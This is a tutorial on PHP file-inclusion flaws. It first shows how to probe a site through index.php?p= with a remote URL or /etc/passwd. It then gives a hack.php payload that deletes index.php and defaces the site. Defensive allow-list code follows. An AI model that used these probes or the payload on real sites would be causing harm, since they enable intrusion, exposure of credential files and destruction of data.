This is a type of vulnerability that allows a user to include remote or local files, which are then parsed and executed on the server.
To see if a certain website is vulnerable to this issue, try visiting “index.php?p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited with remote file inclusion (RFI) or local file inclusion (LFI). If something different appears, then the site is not vulnerable to RFI; this does not necessarily mean it is safe from LFI, however. To verify, try “index.php?p=/etc/passwd”. This assumes the server is running on a *nix-based system. If you can view the password file, then the server can be hacked by LFI. If something else appears, then neither RFI nor LFI will work.
If the target is found to be vulnerable to RFI, you can upload PHP code to their server. Let’s say you create the following in the file hack.php:
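<?php
// Delete the site's existing index.php
unlink("index.php");
// Write a replacement index.php containing only the text GOTCHA
system("echo GOTCHA > index.php");
?>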
Once you view “index.php?p=http://<DOMAIN NAME>.com/hack.php”, then the code will be run on the server. When this is done, the site will change to the simple GOTCHA message and no one will be the wiser.
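On the defending side, the requests above only work when index.php passes the "p" parameter straight to include. The following is an added example, not code from the original post: it shows that assumed vulnerable pattern next to an allow-list replacement, where the page names, the pages directory, and the resolve_page helper are all hypothetical.

```php
<?php
// Added example, not from the original post. The page name arrives in the
// "p" query parameter, as in the URLs above; the page names and file layout
// below are assumptions.

// Vulnerable pattern (assumed): the raw parameter goes straight to include,
// so a URL or a path such as /etc/passwd is opened by the server.
//     include $_GET['p'];

// Hardened form: the parameter only selects a key in a fixed allow-list.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path of the file to include, or null if the request
 * does not name a known page.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Rejects arrays (?p[]=x), URLs, absolute paths, and ../ sequences,
    // because none of them is a key in PAGES.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];
}

// Self-check with constructed inputs; runs from the CLI without a web server.
$base = __DIR__ . '/pages';
$samples = ['home', 'http://www.example.com/', '/etc/passwd', '../index', ['x']];
foreach ($samples as $p) {
    $path = resolve_page($p, $base);
    printf("%-28s => %s\n", json_encode($p, JSON_UNESCAPED_SLASHES), $path ?? 'rejected (404)');
}

// In index.php the call site would be:
//     $path = resolve_page($_GET['p'] ?? 'home', __DIR__ . '/pages');
//     if ($path === null) { http_response_code(404); exit; }
//     include $path;
```

Keeping allow_url_include set to Off in php.ini (its default) also blocks the remote case, but it does nothing for local paths, which is why the allow-list is still needed.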